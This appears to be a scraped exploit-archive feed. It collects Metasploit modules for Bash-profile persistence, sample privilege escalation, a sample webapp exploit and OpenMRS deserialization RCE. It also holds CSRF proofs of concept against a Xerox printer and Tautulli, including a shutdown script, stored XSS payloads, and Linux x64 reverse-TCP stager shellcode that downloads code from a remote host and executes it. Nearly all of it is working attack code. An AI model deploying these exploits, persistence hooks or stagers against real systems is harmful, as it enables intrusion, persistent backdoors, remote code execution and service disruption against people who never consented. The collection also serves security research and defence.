This Metasploit module writes an execution trigger to the target's Bash profile. The execution trigger executes a call back payload whenever the target user opens a Bash terminal. A handler is not run automatically, so you must configure an appropriate exploit/multi/handler to receive the callback.


MD5 | 9ac5bc3f15cb2da635c3325eee14b3cc

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = NormalRanking
include Msf::Post::Common
include Msf::Post::File
include Msf::Post::Unix

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Bash Profile Persistence',
'Description' => %q{"
This module writes an execution trigger to the target's Bash profile.
The execution trigger executes a call back payload whenever the target
user opens a Bash terminal. A handler is not run automatically, so you
must configure an appropriate exploit/multi/handler to receive the callback.
"},
'License' => MSF_LICENSE,
'Author' =>
[
'Michael Long <bluesentinel[at]protonmail.com>'
],
'DisclosureDate' => 'Jun 8 1989', # First public release of Bourne Again Shell
'Platform' => ['unix', 'linux'],
'Arch' => ARCH_CMD,
'SessionTypes' => ['meterpreter', 'shell'],
'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => 'true' },
'Targets' =>
[
['Automatic', {}]
],
'DefaultTarget' => 0,
'Payload' => {
'Compat' =>
{
'PayloadType' => 'cmd'
}
},
'References' =>
[
['URL', 'https://attack.mitre.org/techniques/T1156/']
]
))

register_options(
[
OptString.new('BASH_PROFILE', [true, 'Target Bash profile location. Usually ~/.bashrc or ~/.bash_profile.', '~/.bashrc']),
OptString.new('PAYLOAD_DIR', [true, 'Directory to write persistent payload file.', '/var/tmp/'])
]
)
end

def exploit

# expand home directory path (i.e. '~/.bashrc' becomes '/home/user/.bashrc')
profile_path = datastore['BASH_PROFILE']
if profile_path.start_with?('~/')
home_directory = get_env('$HOME')
profile_path.sub!(/^~/, home_directory)
end

# check that target Bash profile file exists
unless exist?(profile_path)
fail_with Failure::NotFound, profile_path
end
print_good("Bash profile exists: #{profile_path}")

# check that target Bash profile file is writable
unless writable?(profile_path)
fail_with Failure::NoAccess, profile_path
end
print_good("Bash profile is writable: #{profile_path}")

# create Bash profile backup on local system before persistence is added
backup_profile = read_file(profile_path)
backup_profile_path = create_backup_file(backup_profile)
print_status("Created backup Bash profile: #{backup_profile_path}")

# upload persistent payload to target and make executable (chmod 700)
payload_file = datastore['PAYLOAD_DIR'] + Rex::Text.rand_text_alpha(10..16)
upload_and_chmodx(payload_file, payload.encoded)

# write payload trigger to Bash profile
exec_payload_string = "#{payload_file} > /dev/null 2>&1 &" + "\n" # send stdin,out,err to /dev/null
append_file(profile_path, exec_payload_string)
print_good("Created Bash profile persistence")
print_status("Payload will be triggered when target opens a Bash terminal")
print_warning("Don't forget to start your handler:")
print_warning("msf> handler -H #{datastore['LHOST']} -P #{datastore['LPORT']} -p #{datastore['PAYLOAD']}")
end

# create a backup copy of the target's Bash profile on the local system before persistence is added
def create_backup_file(backup_profile)
begin
hostname = session.sys.config.sysinfo["Computer"]
rescue
hostname = cmd_exec("hostname")
end

timestamp = "_" + ::Time.now.strftime("%Y%m%d.%H%M%S")

log_directory_name = ::File.join(Msf::Config.log_directory, 'persistence/' + hostname + timestamp)

::FileUtils.mkdir_p(log_directory_name)

log_file_name = log_directory_name + "/Bash_Profile.backup"
file_local_write(log_file_name, backup_profile)
return log_file_name
end
end

Metasploit Sample Linux Privilege Escalation Exploit

$
0
0

This Metasploit exploit module illustrates how a vulnerability could be exploited in a linux command for privilege escalation.


MD5 | 484a242e6e523fab95eb0bf3936e9709

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

###
#
# This exploit sample shows how an exploit module could be written to exploit
# a bug in a command on a linux computer for priv esc.
#
###
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
include Msf::Post::Linux::Kernel
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper

def initialize(info = {})
super(
update_info(
info,
# The Name should be just like the line of a Git commit - software name,
# vuln type, class. Preferably apply
# some search optimization so people can actually find the module.
# We encourage consistency between module name and file name.
'Name' => 'Sample Linux Priv Esc',
'Description' => %q(
This exploit module illustrates how a vulnerability could be exploited
in an linux command for priv esc.
),
'License' => MSF_LICENSE,
# The place to add your name/handle and email. Twitter and other contact info isn't handled here.
# Add reference to additional authors, like those creating original proof of concepts or
# reference materials.
# It is also common to comment in who did what (PoC vs metasploit module, etc)
'Author' =>
[
'h00die <mike@stcyrsecurity.com>', # msf module
'researcher' # original PoC, analysis
],
'Platform' => [ 'linux' ],
# from underlying architecture of the system. typically ARCH_X64 or ARCH_X86, but the exploit
# may only apply to say ARCH_PPC or something else, where a specific arch is required.
# A full list is available in lib/msf/core/payload/uuid.rb
'Arch' => [ ARCH_X86, ARCH_X64 ],
# What types of sessions we can use this module in conjunction with. Most modules use libraries
# which work on shell and meterpreter, but there may be a nuance between one of them, so best to
# test both to ensure compatibility.
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' => [[ 'Auto', {} ]],
# from lib/msf/core/module/privileged, denotes if this requires or gives privileged access
# since privilege escalation modules typically result in elevated privileges, this is
# generally set to true
'Privileged' => true,
'References' =>
[
[ 'OSVDB', '12345' ],
[ 'EDB', '12345' ],
[ 'URL', 'http://www.example.com'],
[ 'CVE', '1978-1234']
],
'DisclosureDate' => "Nov 29 2019",
# Note that DefaultTarget refers to the index of an item in Targets, rather than name.
# It's generally easiest just to put the default at the beginning of the list and skip this
# entirely.
'DefaultTarget' => 0
)
)
# We typically drop a pre-compiled exploit to disk and run it, however the option
# is left for the user to gcc it themselves if there is an add OS or other dependency
register_options [
OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w[Auto True False] ])
]
# force exploit is used to bypass the check command results
register_advanced_options [
OptBool.new('ForceExploit', [ false, 'Override check result', false ]),
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
]

end

# Simplify pulling the writable directory variable
def base_dir
datastore['WritableDir'].to_s
end

# Simplify and standardize uploading a file
def upload(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
write_file path, data
end

# Simplify uploading and chmoding a file
def upload_and_chmodx(path, data)
upload path, data
chmod path
register_file_for_cleanup path
end

# Simplify uploading and compiling a file
def upload_and_compile(path, data, gcc_args='')
upload "#{path}.c", data

gcc_cmd = "gcc -o #{path} #{path}.c"
if session.type.eql? 'shell'
gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}"
end

if gcc_args.to_s.blank?
gcc_cmd << " #{gcc_args}"
end

output = cmd_exec gcc_cmd

unless output.blank?
print_error output
fail_with Failure::Unknown, "#{path}.c failed to compile"
end

register_file_for_cleanup path
chmod path
end

# Pull the exploit binary or file (.c typically) from our system
def exploit_data(file)
::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'DOES_NOT_EXIST', file)
end

# If we're going to live compile on the system, check gcc is installed
def live_compile?
return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')

if has_gcc?
vprint_good 'gcc is installed'
return true
end

unless datastore['COMPILE'].eql? 'Auto'
fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'
end
end

def check
# Check the kernel version to see if its in a vulnerable range
release = kernel_release
if Gem::Version.new(release.split('-').first) > Gem::Version.new('4.14.11') ||
Gem::Version.new(release.split('-').first) < Gem::Version.new('4.0')
vprint_error "Kernel version #{release} is not vulnerable"
return CheckCode::Safe
end
vprint_good "Kernel version #{release} appears to be vulnerable"

# Check the app is installed and the version, debian based example
package = cmd_exec('dpkg -l example | grep \'^ii\'')
if package && package.include?('1:2015.3.14AR.1-1build1')
print_good("Vulnerable app version #{package} detected")
CheckCode::Appears
end
CheckCode::Safe
end

#
# The exploit method drops a payload file to the system, then either compiles and runs
# or just runs the exploit on the system.
#
def exploit
# First check the system is vulnerable, or the user wants to run regardless
unless check == CheckCode::Appears
unless datastore['ForceExploit']
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
end
print_warning 'Target does not appear to be vulnerable'
end

# Check if we're already root
if is_root?
unless datastore['ForceExploit']
fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'
end
end

# Make sure we can write our exploit and payload to the remote system
unless writable? base_dir
fail_with Failure::BadConfig, "#{base_dir} is not writable"
end

# Upload exploit executable, writing to a random name so AV doesn't have too easy a job
executable_name = ".#{rand_text_alphanumeric(5..10)}"
executable_path = "#{base_dir}/#{executable_name}"
if live_compile?
vprint_status 'Live compiling exploit on system...'
upload_and_compile executable_path, strip_comments(exploit_data('example.c'))
rm_f "#{executable_path}.c"
else
vprint_status 'Dropping pre-compiled exploit on system...'
upload_and_chmodx executable_path, exploit_data('example')
end

# Upload payload executable
payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
upload_and_chmodx payload_path, generate_payload_exe

# Launch exploit with a timeout. We also have a vprint_status so if the user wants all the
# output from the exploit being run, they can optionally see it
timeout = 30
print_status "Launching exploit..."
output = cmd_exec "echo '#{payload_path} & exit' | #{executable_path}", nil, timeout
output.each_line { |line| vprint_status line.chomp }
end
end

Metasploit Sample Webapp Exploit

$
0
0

This Metasploit exploit module illustrates how a vulnerability could be exploited in a webapp.


MD5 | 15880c1bae79cabfa0bc303baa8a9153

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

###
#
# This exploit sample shows how an exploit module could be written to exploit
# a bug in an arbitrary web server
#
###
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking

#
# This exploit affects a webapp, so we need to import HTTP Client
# to easily interact with it.
#
include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(
update_info(
info,
# The Name should be just like the line of a Git commit - software name,
# vuln type, class. Preferably apply
# some search optimization so people can actually find the module.
# We encourage consistency between module name and file name.
'Name' => 'Sample Webapp Exploit',
'Description' => %q(
This exploit module illustrates how a vulnerability could be exploited
in a webapp.
),
'License' => MSF_LICENSE,
# The place to add your name/handle and email. Twitter and other contact info isn't handled here.
# Add reference to additional authors, like those creating original proof of concepts or
# reference materials.
# It is also common to comment in who did what (PoC vs metasploit module, etc)
'Author' =>
[
'h00die <mike@stcyrsecurity.com>', # msf module
'researcher' # original PoC, analysis
],
'References' =>
[
[ 'OSVDB', '12345' ],
[ 'EDB', '12345' ],
[ 'URL', 'http://www.example.com'],
[ 'CVE', '1978-1234']
],
# platform refers to the type of platform. For webapps, this is typically the language of the webapp.
# js, php, python, nodejs are common, this will effect what payloads can be matched for the exploit.
# A full list is available in lib/msf/core/payload/uuid.rb
'Platform' => ['python'],
# from lib/msf/core/module/privileged, denotes if this requires or gives privileged access
'Privileged' => false,
# from underlying architecture of the system. typically ARCH_X64 or ARCH_X86, but for webapps typically
# this is the application language. ARCH_PYTHON, ARCH_PHP, ARCH_JAVA are some examples
# A full list is available in lib/msf/core/payload/uuid.rb
'Arch' => ARCH_PYTHON,
'Targets' =>
[
[ 'Automatic Target', {}]
],
'DisclosureDate' => "Apr 1 2013",
# Note that DefaultTarget refers to the index of an item in Targets, rather than name.
# It's generally easiest just to put the default at the beginning of the list and skip this
# entirely.
'DefaultTarget' => 0
)
)
# set the default port, and a URI that a user can set if the app isn't installed to the root
register_options(
[
Opt::RPORT(80),
OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
OptString.new('PASSWORD', [ false, 'Password to login with', '123456']),
OptString.new('TARGETURI', [ true, 'The URI of the Example Application', '/example/'])
], self.class
)
end

#
# The sample exploit checks the index page to verify the version number is exploitable
# we use a regex for the version number
#
def check
# we want to handle cases where the port/target isn't open/listening gracefully
begin
# only catch the response if we're going to use it, in this case we do for the version
# detection.
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'GET'
)
# gracefully handle if res comes back as nil, since we're not guaranteed a response
# also handle if we get an unexpected HTTP response code
fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") if res.code == 200

# here we're looking through html for the version string, similar to:
# Version 1.2
/Version: (?<version>[\d]{1,2}\.[\d]{1,2})<\/td>/ =~ res.body

if version && Gem::Version.new(version) <= Gem::Version.new('1.3')
vprint_good("Version Detected: #{version}")
Exploit::CheckCode::Appears
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
Exploit::CheckCode::Safe
end

#
# The exploit method attempts a login, then attempts to throw a command execution
# at a web page through a POST variable
#
def exploit
begin
# attempt a login. In this case we show basic auth, and a POST to a fake username/password
# simply to show how both are done
vprint_status('Attempting login')
# since we will check res to see if auth was a success, make sure to capture the return
res = send_request_cgi(
'uri' => '/login.html',
'method' => 'POST',
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'vars_post' => {
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
}
)

# a valid login will give us a 301 redirect to /home.html so check that.
# ALWAYS assume res could be nil and check it first!!!!!
if res && res.code != 301
fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})")
end

# grab our valid cookie
cookie = res.get_cookies
# we don't care what the response is, so don't bother saving it from send_request_cgi
vprint_status('Attempting exploit')
send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'command.html'),
'method' => 'POST',
'cookie' => cookie,
'vars_post' =>
{
'cmd_str' => payload.encoded
}
)

rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end

end
end

OpenMRS Java Deserialization Remote Code Execution

$
0
0

OpenMRS is an open-source platform that supplies users with a customizable medical record system. There exists an object deserialization vulnerability in the webservices.rest module used in OpenMRS Platform. Unauthenticated remote code execution can be achieved by sending a malicious XML payload to a Rest API endpoint such as /ws/rest/v1/concept. This Metasploit module uses an XML payload generated with Marshalsec that targets the ImageIO component of the XStream library. Tested on OpenMRS Platform v2.1.2 and v2.21 with Java 8 and Java 9.


MD5 | c97ba40f300b81ba6c0c682076d3217c

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager

def initialize(info = {})
super(update_info(info,
'Name' => 'OpenMRS Java Deserialization RCE',
'Description' => %q(
OpenMRS is an open-source platform that supplies
users with a customizable medical record system.

There exists an object deserialization vulnerability
in the `webservices.rest` module used in OpenMRS Platform.
Unauthenticated remote code execution can be achieved
by sending a malicious XML payload to a Rest API endpoint
such as `/ws/rest/v1/concept`.

This module uses an XML payload generated with Marshalsec
that targets the ImageIO component of the XStream library.

Tested on OpenMRS Platform `v2.1.2` and `v2.21` with Java
8 and Java 9.
),
'License' => MSF_LICENSE,
'Author' =>
[
'Nicolas Serra', # Vuln Discovery and PoC
'mpgn', # PoC
'Shelby Pace' # Metasploit Module
],
'References' =>
[
[ 'CVE', '2018-19276' ],
[ 'URL', 'https://talk.openmrs.org/t/critical-security-advisory-cve-2018-19276-2019-02-04/21607' ],
[ 'URL', 'https://know.bishopfox.com/advisories/news/2019/02/openmrs-insecure-object-deserialization' ],
[ 'URL', 'https://github.com/mpgn/CVE-2018-19276/' ]
],
'Platform' => [ 'unix', 'linux' ],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'Targets' =>
[
[ 'Linux',
{
'Arch' => [ ARCH_X86, ARCH_X64 ],
'Platform' => [ 'unix', 'linux' ],
'CmdStagerFlavor' => 'printf'
}
]
],
'DisclosureDate' => '2019-02-04',
'DefaultTarget' => 0
))

register_options(
[
Opt::RPORT(8081),
OptString.new('TARGETURI', [ true, 'Base URI for OpenMRS', '/' ])
])

register_advanced_options([ OptBool.new('ForceExploit', [ false, 'Override check result', false ]) ])
end

def check
res = send_request_cgi!('method' => 'GET', 'uri' => normalize_uri(target_uri.path))
return CheckCode::Unknown("OpenMRS page unreachable.") unless res

return CheckCode::Safe('Page discovered is not OpenMRS.') unless res.body.downcase.include?('openmrs')
response = res.get_html_document
version = response.at('body//h3')
return CheckCode::Detected('Successfully identified OpenMRS, but cannot detect version') unless version && version.text

version_no = version.text
version_no = version_no.match(/\d+\.\d+\.\d*/)
return CheckCode::Detected('Successfully identified OpenMRS, but cannot detect version') unless version_no

version_no = Gem::Version.new(version_no)

if (version_no < Gem::Version.new('1.11.8') || version_no.between?(Gem::Version.new('2'), Gem::Version.new('2.1.3')))
return CheckCode::Appears("OpenMRS platform version: #{version_no}")
end

CheckCode::Safe
end

def format_payload
payload_data = payload.encoded.to_s.encode(xml: :text)
payload_arr = payload_data.split('', 3)
payload_arr.map { |arg| "<string>#{arg}</string>" }.join.gsub("'", "")
end

def read_payload_data(payload_cmd)
# payload generated with Marshalsec
erb_path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-19276', 'payload.erb')
payload_data = File.binread(erb_path)
payload_data = ERB.new(payload_data).result(binding)

rescue Errno::ENOENT
fail_with(Failure::NotFound, "Failed to find erb file at the given path: #{erb_path}")
end

def execute_command(cmd, opts={})
cmd = cmd.encode(xml: :text)
xml_data = "<string>sh</string><string>-c</string><string>#{cmd}</string>"
rest_uri = normalize_uri(target_uri.path, 'ws', 'rest', 'v1', 'concept')
payload_data = read_payload_data(xml_data)

send_request_cgi(
'method' => 'POST',
'uri' => rest_uri,
'headers' => { 'Content-Type' => 'text/xml' },
'data' => payload_data
)
end

def exploit
chk_status = check
print_status('Target is running OpenMRS') if chk_status == CheckCode::Appears
unless ((chk_status == CheckCode::Appears || chk_status == CheckCode::Detected) || datastore['ForceExploit'] )
fail_with(Failure::NoTarget, 'Target is not vulnerable')
end

cmds = generate_cmdstager(:concat_operator => '&&')
print_status('Sending payload...')
cmds.first.split('&&').map { |cmd| execute_command(cmd) }
end
end

Xerox AltaLink C8035 Printer Cross Site Request Forgery

$
0
0

The Xerox AltaLink C8035 Printer suffers from a cross site request forgery vulnerability.


MD5 | 6689468b94a86a3ce33b1643d02a6fa7

# Exploit Title: Xerox AltaLink C8035 Printer - Cross-Site Request Forgery (Add Admin)
# Date: 2018-12-17
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.xerox.com/
# Hardware Link : https://www.office.xerox.com/en-us/multifunction-printers/altalink-c8000-series
# Software : Xerox Printer
# Product Version: AltaLink C8035
# Vulernability Type : Cross-Site Request Forgery (Add Admin)
# Vulenrability : Cross-Site Request Forgery
# CVE : CVE-2019-19832

# Description :

The CSRF vulnerability was discovered in the AltaLink C8035 printer model of Xerox printer hardware.
A request to add users is made in the Device User Database form field. This request is captured by
the proxy. And a CSRF PoC HTML file is prepared. Xerox AltaLink C8035 printers allow CSRF. A request
to add users is made in the Device User Database form field to the xerox.set URI.
(The frmUserName value must have a unique name.)


# HTTP POST Request :

POST /dummypost/xerox.set HTTP/1.1
Host: 158.162.130.37
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 707
Origin: https://158.162.130.37
Connection: close
Referer: https://158.162.130.37/properties/authentication/UserEdit.php?nav_point_key=10
Cookie: PHPSESSID=fd93756986787a2e338da8eae1ff2ef4; statusSelected=n1; statusNumNodes=8; CERT_INFO=8738a6169beda5f6cc754db4fc40ad63; propSelected=n59; propHierarchy=00000001000000000000000010010; LastPage=/properties/authentication/UserManager.php%3Fx%3D%26sort%3DFname%26order%3DUp
Upgrade-Insecure-Requests: 1

NextPage=%2Fproperties%2Fauthentication%2FUserManager.php%3F&isRoles=True&isPassword=True&isCreate=True&rolesStr=6%2C1%2C2&limited=0&oid=0&minLength=1&maxLength=63&isFriendlyNameDisallowed=TRUE&isUserNameDisallowed=TRUE&isNumberRequired=&CSRFToken=34cd705fa4b7954de314c8fa919c22c0ec771cb264032c058d230df9a0af0fae90ec55326145b35d14daf2696e3d8302bd3aad10f08d4562178e93804098c32a&currentPage=%2Fproperties%2Fauthentication%2FUserEdit.php%3Fnav_point_key%3D10&_fun_function=HTTP_Set_User_Edit_fn&frmFriendlyName=Ismail+Tasdelen&frmUserName=ismailtasdelen&frmNewPassword=Test1234%21&frmRetypePassword=Test1234%21&frmOldPassword=undefined&SaveURL=%2Fproperties%2Fauthentication%2FUserEdit.php%3Fnav_point_key%3D10

# CSRF PoC HTML :

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://158.162.130.37/dummypost/xerox.set" method="POST">
<input type="hidden" name="NextPage" value="/properties/authentication/UserManager.php?" />
<input type="hidden" name="isRoles" value="True" />
<input type="hidden" name="isPassword" value="True" />
<input type="hidden" name="isCreate" value="True" />
<input type="hidden" name="rolesStr" value="6,1,2" />
<input type="hidden" name="limited" value="0" />
<input type="hidden" name="oid" value="0" />
<input type="hidden" name="minLength" value="1" />
<input type="hidden" name="maxLength" value="63" />
<input type="hidden" name="isFriendlyNameDisallowed" value="TRUE" />
<input type="hidden" name="isUserNameDisallowed" value="TRUE" />
<input type="hidden" name="isNumberRequired" value="" />
<input type="hidden" name="CSRFToken" value="34cd705fa4b7954de314c8fa919c22c0ec771cb264032c058d230df9a0af0fae90ec55326145b35d14daf2696e3d8302bd3aad10f08d4562178e93804098c32a" />
<input type="hidden" name="currentPage" value="/properties/authentication/UserEdit.php?nav_point_key=10" />
<input type="hidden" name="_fun_function" value="HTTP_Set_User_Edit_fn" />
<input type="hidden" name="frmFriendlyName" value="Ismail Tasdelen" />
<input type="hidden" name="frmUserName" value="ismailtasdelen" />
<input type="hidden" name="frmNewPassword" value="Test1234!" />
<input type="hidden" name="frmRetypePassword" value="Test1234!" />
<input type="hidden" name="frmOldPassword" value="undefined" />
<input type="hidden" name="SaveURL" value="/properties/authentication/UserEdit.php?nav_point_key=10" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Tautulli 2.1.9 Cross Site Request Forgery

$
0
0

Tautulli version 2.1.9 suffers from a cross site request forgery vulnerability.


MD5 | 83ae455879cfd946e48758d964304d3b

# Exploit Title: Tautulli v2.1.9 - Cross-Site Request Forgery (ShutDown)
# Date: 2018-12-17
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://tautulli.com/
# Software : https://github.com/Tautulli/Tautulli
# Product Version: v2.1.9
# Platform: Windows 10 (10.0.18362)
# Python Version: 2.7.11 (v2.7.11:6d1b6a68f775, Dec 5 2015, 20:40:30) [MSC v.1500 64 bit (AMD64)]
# Vulernability Type : Cross-Site Request Forgery (ShutDown)
# Vulenrability : Cross-Site Request Forgery
# CVE : CVE-2019-19833

# Description :

In the corresponding version of v2.1.9 by the manufacturer of Tautulli, it has
been discovered that anonymous access can be achieved in applications that do
not have a user login area and that the remote media server can be shut down.

# Python Script :

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import requests

icon = """
_____ __ _ _ _____ _ _ _ _ _ _ _ ___ __ ___
|_ _/ \| || |_ _| || | | | | | | | \ / (_ | / |/ _ \
| || /\ | \/ | | | | \/ | |_| |_| | `\ V /'/ /__`7 |\__ /
|_||_||_|\__/ |_| \__/|___|___|_| \_/ |___\/ |_\//_/
Unauthenticated Remote Code Execution
by Ismail Tasdelen
"""

print(icon)

host = input("[+] HOST: ")
port = input("[+] PORT: ")

response = requests.get("http://" + host + ":" + port + "/" + "shutdown" ) # You can also run the restart and update_check commands.

if response.status_code == 200:
print('[✓] Success!')
elif response.status_code != 200:
print('[✗] Unsuccessful!')
else:
exit()

# HTTP GET Request :

GET /shutdown HTTP/1.1
Host: XXX.XXX.XXX.XXX:8181
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://XXX.XXX.XXX.XXX:8181/home
Upgrade-Insecure-Requests: 1

# CSRF PoC HTML :

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://XXX.XXX.XXX.XXX:8181/shutdown">
<input type="submit" value="Submit request" />
</form>
</body>
</html>


Serv-U FTP Server 15.1.7 Cross Site Scripting

$
0
0

Serv-U FTP Server version 15.1.7 suffers from a persistent cross site scripting vulnerability leveraging the Email parameter.


MD5 | 514d8ebc96f062a481bd19ea5e4b5040

# Exploit Title: Stored Cross-Site Scripting
# Date: 16/12/2019
# Exploit Author: Cyb0r9
# Vendor Homepage: https://www.serv-u.com/ <https://www.serv-u.com/>
# Software Link: https://www.serv-u.com/downloads <https://www.serv-u.com/downloads>
# Version: SOLARWIND Serv-U FTP Server v15.1.7
# Tested on: Windows 10 x64
# CVE : CVE-2019-19829

# Overview

The application is vulnerable to a XSS stored vulnerability.

Vulnerable parameter : Email

lacked input validation allowing Javascript code to be inserted and executed
in the context the user's browser session either when the victim logs to the
web client or browses to the Serv-U server login page.

A privilege user could manipulate the affected parameter on an existing
user's account so that Javascript is executed on the client's browser when
the victim logs into his account.

For example, a successful XSS attack could result in the attacker
redirecting the user to a phishing/malicious site or performing actions as
the victim on the Serv-U application.

** Injection Point in user properties **

* Email

# Proof of concept

1) Login as a user that has privileges to create or modify users.

2) Create a new user and add the following payload into the "Email" parameter.

Payload used : "'/><script>alert(7);</script>@gmail.com"'/></script><script>;alert(7);</script>

3) Login as the victim user and observe popup alert.

Zendesk SweetHawk Survey 1.6 Cross Site Scripting

$
0
0

Zendesk SweetHawk Survey version 1.6 suffers from a persistent cross site scripting vulnerability.


MD5 | c93c55f5716c37b650b5788261cdc004

# Exploit Title: Zendesk App SweetHawk Survey 1.6 - Persistent Cross-Site Scripting
# Date: 2019-12-17
# Exploit Author: MTK
# Vendor Homepage: https://sweethawk.co/zendesk/survey-app
# Software Link: https://www.zendesk.com/apps/support/survey/
# Version: Up to v1.6
# Tested on: Zendesk - Firefox/Windows

# Software description:
# Sweet Hawk Survey app ask customers for a 0-10 score instead of the normal good or bad question.
# You can get more granular satisfaction data without compromising the response rate.
# Ask an optional NPS question on the landing page. View reports and drill down into the response
# detail and go directly to the ticket. Easy to set up, just replace the survey place holder in
# your trigger or automation. Customize the landing pages for each of your brands.

# Technical Details & Impact:
# Attackers use vulnerable web pages to inject malicious code and have it stored on the web server
# for later use. The payload is automatically served to users who browse web pages and executed in
# their context. Thus, the victims do not need to click on a malicious link to run the payload.
# All they have to do is visit a vulnerable web page.

# POC

1. Open Support ticket in Zendesk and send XSS payload e.g;
<script>alert(1);</script>
2. Generate survey request to rate the ticket and payload will execute;

# Time line
09-19-2019 - Vulnerability discovered
09-20-2019 - Vendor contacted
12-02-2019 - Detailed report shared and full disclosure time line given with no response
12-17-2019 - Full Disclosure

Linux/x64 Reverse TCP Stager Shellcode

$
0
0

188 bytes small Lnux/x64 reverse TCP stager shellcode.


MD5 | 140e35142f4d23741799a818d695e97f

;# Title: Linux/x64 - Reverse TCP Stager Shellcode (188 bytes)
;# Date: 2019-12-16
;# Author: Lee Mazzoleni
;# Tested on: Ubuntu 18.04.2 LTS
; reverse tcp stager - download and execute up to 4096 bytes of additional payload - no null bytes in this
; this code is 188 bytes total (less if you delete the exit() syscall at the end)

global _start

section .text
_start:

;// =================>
;// HEAP ALLOCATION =>
;// =================>
xor rax, rax
mov al, 6
mov cl, 2
imul ax, cx ;// int brk()
xor rdi, rdi
syscall ;// brk()
xor rax, rax
mov al, 2
mov cl, 6
imul ax, cx
xor rdi, rdi
mov dil, 128
imul di, 32
syscall ;// brk(0x1000) - 4096 bytes
xchg rcx, rax ;// save addr of our allocated memory in rcx

;//=======================>
;// MAP HEAP PERMISSIONS =>
;//=======================>
xor rax, rax
mov al, 9
xchg rdi, rcx
xor rsi, rsi
mov sil, 128
imul si, 32
xor rdx, rdx
mov dl, 0x7
xor r10, r10
mov r10b, 0x21
xor r9, r9
mov r8, -1
syscall ;// mmap(addr, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, -1, 0)
mov r9, rax ;// save heap address in r9

;// ===================>
;// SOCKET CONNECTION =>
;// ===================>
xor rax, rax
mov al, 41 ;// int socket()
xor rdi, rdi
inc rdi
inc rdi ;// AF_INET
xor rsi, rsi
inc rsi ;// SOCK_STREAM
xor rdx, rdx
mov dl, 6 ;// IPPROTO_TCP
syscall ;// socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)
push rax
pop rdi ;// save the socket's fd in rdi for connect() to use

xor rax, rax
push rax
mov dword [rsp-4], 0x2a37a8c0 ;// 192.168.55.42
mov word [rsp-6], 0xbb01 ;// port 443 in lil' endian
sub rsp, 6
push word 0x2

xor rax, rax
mov al, 42 ;// int connect()
mov rsi, rsp
xor rdx, rdx
mov dl, 16
syscall ;// connect(3, {sa_family=AF_INET, sin_port=htons(443), sin_addr=inet_addr("192.168.55.42")}, 16)

;// ====================================>
;// READ CODE FROM SOCKET FD INTO HEAP =>
;// ====================================>
mov rsi, r9 ;// heap addr still saved in r9
xor rdx, rdx
mov dl, 41 ;// CHANGE THIS NUMBER TO SUIT THE SIZE OF YOUR PAYLOAD (41-byte payload used in testing)
xor rax, rax
syscall ;// read(3, heap_addr, SIZE)

;// =================>
;// CLOSE SOCKET FD =>
;// =================>
xor rax, rax
mov al, 3
syscall ;// close(3)

jmp r9 ;// jmp to the heap address in r9 and execute the downloaded payload

;// =========>
